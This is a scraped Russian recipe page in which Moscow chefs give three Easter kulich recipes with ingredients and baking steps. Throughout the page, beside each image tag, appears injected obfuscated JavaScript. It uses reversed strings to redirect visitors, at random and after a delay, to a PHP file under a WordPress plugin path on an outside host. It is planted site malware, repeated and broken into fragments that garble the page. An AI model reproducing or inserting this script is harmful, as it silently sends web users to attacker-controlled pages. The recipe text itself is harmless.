Пасха уже совсем скоро. Домашние куличи намного вкуснее покупных, поэтому мы попросили шеф-поваров московских ресторанов поделиться их любимыми рецептами традиционного пасхального блюда.
320 calories
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-2.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-2.jpg»>
Классический пасхальный кулич
Традиционный кулич от шеф-повара кафе и пекарни «Хачапурия» Григория Менешяна.
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-2.jpg» class=»c1″ alt=»Изображение рецепта Классический пасхальный кулич» title=»Изображение рецепта Классический пасхальный кулич»>
Классический пасхальный кулич
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
420 минут
PT7H
PT7H
КОЛИЧЕСТВО ПОРЦИЙ:
8 порций
КАЛОРИЙНОСТЬ:
320 ккал
Сложность
Время
420 минут
Кол-во порций
8 порций
Калорийность
320 ккал
Ингредиенты
Мука (пшеничная)
350 г
Сахар
10 г
Соль
1 г
Дрожжи
6 г
Мускатный орех
1 щепотка
Яйца
2 шт.
Сметана
2 ст. л.
Молоко
100 мл
Масло (сливочное)
100 г
Изюм
40 г
Сок (лимонный)
10 мл
Сухофрукты (цукаты)
40 г
Коньяк
10 мл
Ваниль
1 щепотка
Процесс приготовления
- В молоко добавьте сухие дрожжи, муку и перемешайте. Накройте полотенцем и оставьте тесто в прохладном месте на два часа.
- Тщательно замесите тесто, добавьте сметану, сливочное масло, яйца и сахар. Перемешайте, накройте полотенцем и оставьте на три часа в тёплом месте.
- Добавьте изюм, предварительно замоченный в тёплой воде, цукаты, мускатный орех, лимонный сок, ваниль, коньяк. Тщательно перемешайте и снова оставьте тесто в тёплом месте на час.
- Готовое тесто выложите в форму и выпекайте в течение 50 минут в хорошо прогретой духовке при температуре 180 градусов.
342 calories
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-26.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-26.jpg»>
Пасхальный кулич с изюмом и глазурью
Рецепт кулича от шеф-кондитера сети кафе-пиццерий FORNETTO Ивана Копылова.
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-26.jpg» class=»c1″ alt=»Изображение рецепта Пасхальный кулич с изюмом и глазурью» title=»Изображение рецепта Пасхальный кулич с изюмом и глазурью»>
Пасхальный кулич с изюмом и глазурью
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
70 минут
PT1H10M
PT1H10M
КОЛИЧЕСТВО ПОРЦИЙ:
8 порций
КАЛОРИЙНОСТЬ:
342 ккал
Сложность
Время
70 минут
Кол-во порций
8 порций
Калорийность
342 ккал
Ингредиенты
Дрожжи (живые)
23 г
Молоко (тёплое)
120 г
Сахар
200 г
Масло (сливочное)
200 г
Мука
450 г
Соль
5 г
Творог
200 г
Яйца (желток)
1 г
Яйца
3 шт.
Изюм
120 г
Яйца (белок)
50 г
Сахар (пудра)
300 г
Лимон (сок)
20 г
Процесс приготовления
- Смешайте дрожжи, молоко, 150 граммов сахара и 100 граммов муки. Поставьте в тёплое место на 30 минут, чтобы опара поднялась.
- Добавьте оставшуюся муку, соль, творог, яйца и желток, изюм. Перемешайте.
- Выложите тесто в формы и выпекайте 35–40 минут при 180 градусах — до готовности.
- Для глазури смешайте белок яиц, сахарную пудру и сок лимона. Покройте глазурью кулич и украсьте.
470 calories
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-11.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-11.jpg»>
Пасхальный кулич с нутеллой, оreo и кit-кat
Необычный кулич с любимыми сладостями от шеф-кондитера ресторанов il FORNO, «Лимончино», 800 Contemporary Steak и CUT Романа Новаковского.
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-11.jpg» class=»c1″ alt=»Изображение рецепта Пасхальный кулич с нутеллой, оreo и кit-кat» title=»Изображение рецепта Пасхальный кулич с нутеллой, оreo и кit-кat»>
Пасхальный кулич с нутеллой, оreo и кit-кat
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
90 минут
PT1H30M
PT1H30M
КОЛИЧЕСТВО ПОРЦИЙ:
8 порций
КАЛОРИЙНОСТЬ:
470 ккал
Сложность
Время
90 минут
Кол-во порций
8 порций
Калорийность
470 ккал
Ингредиенты
Дрожжи
27 г
Молоко
320 мл
Сахар
180 г
Мука
400 г
Яйца (желток)
3 шт.
Яйца
1 шт.
Масло (сливочное)
140 г
Масло (оливковое)
50 мл
Масло (сливочный)
200 г
Разрыхлитель
7 г
Нутелла
50 г
Печенье (оreo)
50 г
Шоколад (кit-кat)
100 г
Процесс приготовления
- Смешайте для теста дрожжи, 150 миллилитров тёплого молока, 30 граммов сахара и 100 граммов муки. Поставьте в тёплое место на 30 минут.
- Добавьте все остальные ингредиенты, кроме топинга, и хорошо перемешайте.
- Выложите тесто в форму на половину высоты.
- Поставьте в духовку и выпекайте при 180 градусов до готовности — 40–45 минут.
- Готовый кулич остудите.
- Нутеллу подогрейте на водяной бане и полейте ею кулич. Украсьте сверху печеньем и палочками кit-кat.
Статьи по теме
Пасхальный кулич: 3 диетических рецепта
Творожные мини-куличи
Пасхальный кулич от шеф-кондитера «Гранд кафе Dr.Живаго»
5 рецептов пасхальных куличей (есть даже без глютена и яиц)